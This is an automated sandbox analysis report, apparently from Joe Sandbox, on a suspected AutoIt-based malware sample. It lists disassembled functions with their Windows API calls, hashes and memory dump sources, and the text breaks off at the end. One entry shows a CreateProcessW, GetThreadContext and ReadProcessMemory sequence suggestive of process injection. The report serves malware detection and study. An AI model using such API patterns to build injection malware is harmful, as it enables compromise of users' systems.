Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c051c155252b75519c4d83c5e1bc273dfc1f3c46ab65e027325793155fe53d63
Instruction ID: b5412c1dc8913a221be99c18d0b223bfd1607e9834b26aa9888b2897b0fb6906
Opcode Fuzzy Hash: c051c155252b75519c4d83c5e1bc273dfc1f3c46ab65e027325793155fe53d63
Instruction Fuzzy Hash: 7801B170248708BEFB254E28CC8AF663B9CEB01768F10C319BAE56A1E0C6B51E45DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00980FF6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0098594C: __FF_MSGBANNER.LIBCMT ref: 00985963
Part of subcall function 0098594C: __NMSG_WRITE.LIBCMT ref: 0098596A
Part of subcall function 0098594C: RtlAllocateHeap.NTDLL(01620000,00000000,00000001,00000000,?,?,?,00981013,?), ref: 0098598F

std::exception::exception.LIBCMT ref: 0098102C
__CxxThrowException@8.LIBCMT ref: 00981041

Part of subcall function 009887DB: RaiseException.KERNEL32(?,?,?,00A1BAF8,00000000,?,?,?,?,00981046,?,00A1BAF8,?,00000001), ref: 00988830

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: e2abf4dece717a1ab0508b6ce356f675b993242a9dc28d0bacac1ad8c80ec840
Instruction ID: d6a9ee6f4613d6d1115dac189b09fa2c46734eb9889c6f2f8160047c490e7a96
Opcode Fuzzy Hash: e2abf4dece717a1ab0508b6ce356f675b993242a9dc28d0bacac1ad8c80ec840
Instruction Fuzzy Hash: ADF0AF3550431DA6CB20BF98EC05BEF7BACAF41350F504426F908A6791EFB1CA8597A5

Uniqueness

Uniqueness Score: -1.00%

Function 0098582D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0098585C
__lock_file.LIBCMT ref: 0098587D

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: 642d4f9c5335d1fcaf92a530aba3cbd32e22a1bc81072a02743c62cc11141d80
Instruction ID: 94fdb6bf857499d168b3156243213aaabb064529a18e5890e8256058e19e70bf
Opcode Fuzzy Hash: 642d4f9c5335d1fcaf92a530aba3cbd32e22a1bc81072a02743c62cc11141d80
Instruction Fuzzy Hash: AE01A771C00608EBCF22FF698C0569F7B65AFC0360F558216F8145B3B1DB358A61DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 009855D6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00988D68: __getptd_noexit.LIBCMT ref: 00988D68

__lock_file.LIBCMT ref: 0098561B

Part of subcall function 00986E4E: __lock.LIBCMT ref: 00986E71

__fclose_nolock.LIBCMT ref: 00985626

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: b678bc6e38283e08e097d031413a362665356ba509ecfd67f6ff9b574fc0b1b4
Instruction ID: 6ac837f772819a5fc21d7eb973065ff3f4945fdab6b6d557174fa2087ab9a8b4
Opcode Fuzzy Hash: b678bc6e38283e08e097d031413a362665356ba509ecfd67f6ff9b574fc0b1b4
Instruction Fuzzy Hash: ADF0B472800A049BD720BF75880276F77E16FC0334F968209A414EB3C1DF7C89459BA5

Uniqueness

Uniqueness Score: -1.00%

Function 009681C1 Relevance: 2.6, APIs: 2, Instructions: 54COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,?,?,?,0096558F,?,?,?,?,?), ref: 009681DA
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,?,?,0096558F,?,?,?,?,?), ref: 0096820D

Part of subcall function 009678AD: _memmove.LIBCMT ref: 009678E9

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: ByteCharMultiWide$_memmove
String ID:
API String ID: 3033907384-0
Opcode ID: a8b92bed442377b19e1936a0c89817f8c0d56a131c691233fd3c4fb9a5160701
Instruction ID: f90aa7eb7dc43b0ba7ed15c9848d0e212978e81ae9ec320c0350be56e4018440
Opcode Fuzzy Hash: a8b92bed442377b19e1936a0c89817f8c0d56a131c691233fd3c4fb9a5160701
Instruction Fuzzy Hash: 1301AD31205244BFEB246A25DD9AF7B7F6CEB89760F10812AFD05CE2A0DE219C009671

Uniqueness

Uniqueness Score: -1.00%

Function 03E912FD Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 03E91ABB
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03E91B51
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03E91B73

Memory Dump Source

Source File: 00000000.00000002.2134404358.0000000003E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e90000_SecuriteInfo.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
Instruction ID: 65cdab40314c223925d22c92d30ac9c48cec40d846b3ea16a155951b49a85a72
Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
Instruction Fuzzy Hash: F212CF24E14658C6EB24DF64D8507DEB232EF68300F10A1E9910DEB7A5E77A4F81CF5A

Uniqueness

Uniqueness Score: -1.00%

Function 0096F3F0 Relevance: 1.7, APIs: 1, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a32d6b3d367b6e96796ad520a2aa4faca1acc1d608fbb0566e86b59479b480c2
Instruction ID: bf0f2f8eea8efe68ee2babc77e3b0c5269d7fe951620ef9ce5a4635bfcd90e34
Opcode Fuzzy Hash: a32d6b3d367b6e96796ad520a2aa4faca1acc1d608fbb0566e86b59479b480c2
Instruction Fuzzy Hash: 0561BB7060024A9FCB10DF64D9A1B7AB7E9EF85300F148479E9168B291EB74ED51CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00972123 Relevance: 1.7, APIs: 1, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 357593693f6575e865b6538dafe2a8b127cfa94bb9f7c4537ccb317c280b941e
Instruction ID: c9024ff37f7fcbedbe6aeed19a5c817fea7fdf095fa77ef4b3cbe3d48e1eeaef
Opcode Fuzzy Hash: 357593693f6575e865b6538dafe2a8b127cfa94bb9f7c4537ccb317c280b941e
Instruction Fuzzy Hash: 11518135600604AFCF14EF68C991F6E77AAAFC5710F198468F94AAB392CB34ED05CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00965C4E Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00965CF6

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 265cc61ac337b0370ddeaf96f1de6a51a0ad61a4842ba4bc49e7f4089e273695
Instruction ID: 7783e5b2fa46609692ba808c9e9db6c8ea68d295943a36a81c8fe236f8ea5d50
Opcode Fuzzy Hash: 265cc61ac337b0370ddeaf96f1de6a51a0ad61a4842ba4bc49e7f4089e273695
Instruction Fuzzy Hash: E5317E31A00B0AAFCB18DF2DC894A6DB7B5FF88310F158629E81993750D735BD60DB90

Uniqueness

Uniqueness Score: -1.00%

Function 009A00D6 Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 009A00E1

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 43b137b5ce867e2c84bbffeda8ab0a30500a96b12ee6aeae2c6c6a229bc0bb66
Instruction ID: 635dc43115579b7e20e7f4f6d98367e6668dc34f19afb73ac25d4cde77ee057e
Opcode Fuzzy Hash: 43b137b5ce867e2c84bbffeda8ab0a30500a96b12ee6aeae2c6c6a229bc0bb66
Instruction Fuzzy Hash: 3C411574508351CFDB24DF14C894B1ABBE4BF85318F0988ACE8899B362C336E885CF52

Uniqueness

Uniqueness Score: -1.00%

Function 0096C707 Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

_wcscmp.LIBCMT ref: 0096C73D

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: _wcscmp
String ID:
API String ID: 856254489-0
Opcode ID: 4818b0ae9b57ab4f8097a229ed472d01a84c115f08edef27e6b2e93bf9a5a723
Instruction ID: 7bdf66621a4f4584e52e33c20e4eb95e4a027574a7edc9950f4e735a86e57fc2
Opcode Fuzzy Hash: 4818b0ae9b57ab4f8097a229ed472d01a84c115f08edef27e6b2e93bf9a5a723
Instruction Fuzzy Hash: 1B11727190411DEBCB14EBE9DC81AEEF778EF95360F108116F851A7190EB309E05CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00964F3D Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00964D13: FreeLibrary.KERNEL32(00000000,?), ref: 00964D4D

Part of subcall function 0098548B: __wfsopen.LIBCMT ref: 00985496

LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00A262F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00964F6F

Part of subcall function 00964CC8: FreeLibrary.KERNEL32(00000000), ref: 00964D02

Part of subcall function 00964DD0: _memmove.LIBCMT ref: 00964E1A

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: 33c7f3a437e09e965e670333bf4cd8cef13f7e91cd52683a8069f9e8d9fd56f1
Instruction ID: a199af1468b14be659555db946368d15a5e209f99e78dacc26d4cc553d095556
Opcode Fuzzy Hash: 33c7f3a437e09e965e670333bf4cd8cef13f7e91cd52683a8069f9e8d9fd56f1
Instruction Fuzzy Hash: 1011E331A00209AACF10BFB4DC52FAE77A89F84700F11882AF545AA2C1DA759A059BA0

Uniqueness

Uniqueness Score: -1.00%

Function 009A01AF Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 009A01BB

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 64b3fa2f5eb5d9f29638de15ea15eb2393277709194cbbecb83e2afe6fe8f408
Instruction ID: b60746343d3f06b62b78459662826af5934c54be72b24da9c6cc93fa4628ec28
Opcode Fuzzy Hash: 64b3fa2f5eb5d9f29638de15ea15eb2393277709194cbbecb83e2afe6fe8f408
Instruction Fuzzy Hash: E22110B4508341DFCB25DF14C884B1ABBE4BF89314F058968E89A5B761D736E849CF93

Uniqueness

Uniqueness Score: -1.00%

Function 00965D20 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,00965807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00965D76

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 73acd3944016cc696b98ba7a06e62de10e6618e23365f2174757c45863b5e15d
Instruction ID: cf2ebb3ad63ee7db0d7a843661eae4745b92c5013630a000fa5b51b1ebeb0e2e
Opcode Fuzzy Hash: 73acd3944016cc696b98ba7a06e62de10e6618e23365f2174757c45863b5e15d
Instruction Fuzzy Hash: 91113371204B05AFD3308F15C898B66B7E9EF45760F11C92EE5AA8AA90D7B0E945CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0096C6DA Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

_wcscmp.LIBCMT ref: 0096C73D

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: _wcscmp
String ID:
API String ID: 856254489-0
Opcode ID: d17b61dbab2f544f392bdf9c54a4f121d02dceff90698d855059ec6961dfcbc4
Instruction ID: a93072578d6bd1ddd4450407ed59b588228036d1219bec24006bf6b263de28f7
Opcode Fuzzy Hash: d17b61dbab2f544f392bdf9c54a4f121d02dceff90698d855059ec6961dfcbc4
Instruction Fuzzy Hash: D501DB71D082555FD7119B788C506AEFF74DF96750F19809AE490AB191E6309D42CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00984A93 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 00984AD6

Part of subcall function 00988D68: __getptd_noexit.LIBCMT ref: 00988D68

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: a0c548996e926cc7d1f4764c6f93a39dab5fa19bcb2f58b1d654c588afc414cd
Instruction ID: de6e557ab58f26634ce72b336375121d1f2999f93618095090dc180d57e332df
Opcode Fuzzy Hash: a0c548996e926cc7d1f4764c6f93a39dab5fa19bcb2f58b1d654c588afc414cd
Instruction Fuzzy Hash: E4F0C83194020AABDF61BF74CC063DF7665AF80325F448514F4149E3D1DB788951DF61

Uniqueness

Uniqueness Score: -1.00%

Function 00964FAA Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,00A262F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00964FDE

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: ae13a70dfb0c5594062384ed4045ae2dd5c6e3d0fed6b57400377c098788fc72
Instruction ID: bddfaa59ffa1f6a633dd9e318c08b115147377efeec6f9f948a545b5ae9f166f
Opcode Fuzzy Hash: ae13a70dfb0c5594062384ed4045ae2dd5c6e3d0fed6b57400377c098788fc72
Instruction Fuzzy Hash: 7FF03971109712CFCB349FA4E894812BBF5BF043293208E7EE1D682610C771A844DF40

Uniqueness

Uniqueness Score: -1.00%

Function 009809D5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 009809F4

Part of subcall function 00967D2C: _memmove.LIBCMT ref: 00967D66

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: 4fb924d8de71cc140d3fba19fdf53379965a26018a50e5a894fd863798996392
Instruction ID: 1c7192ff33fde4c3b57fe243473fb27542c1e9dd6d657d5da27ad1b35dc2b64a
Opcode Fuzzy Hash: 4fb924d8de71cc140d3fba19fdf53379965a26018a50e5a894fd863798996392
Instruction Fuzzy Hash: 6CE0863690422857C720D6989C05FFAB7ADDFC8791F0401B6FD0CD7248D9609C818690

Uniqueness

Uniqueness Score: -1.00%

Function 009C9129 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 009C914B

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
Instruction ID: 5533ea7a2c02a403f49624f38d239712b1b0857785bf394435a4607817cdc111
Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
Instruction Fuzzy Hash: E2E092B0508B005FDB348B24D815BE373E4BB06315F04081DF29AC3341EB6278418759

Uniqueness

Uniqueness Score: -1.00%

Function 00965DAE Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,0099E16B,?,?,00000000), ref: 00965DBF

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: e333a1ea0bae96ba64603e5e0a7563877942f91c1d1cdc1937c3ca309299fe3e
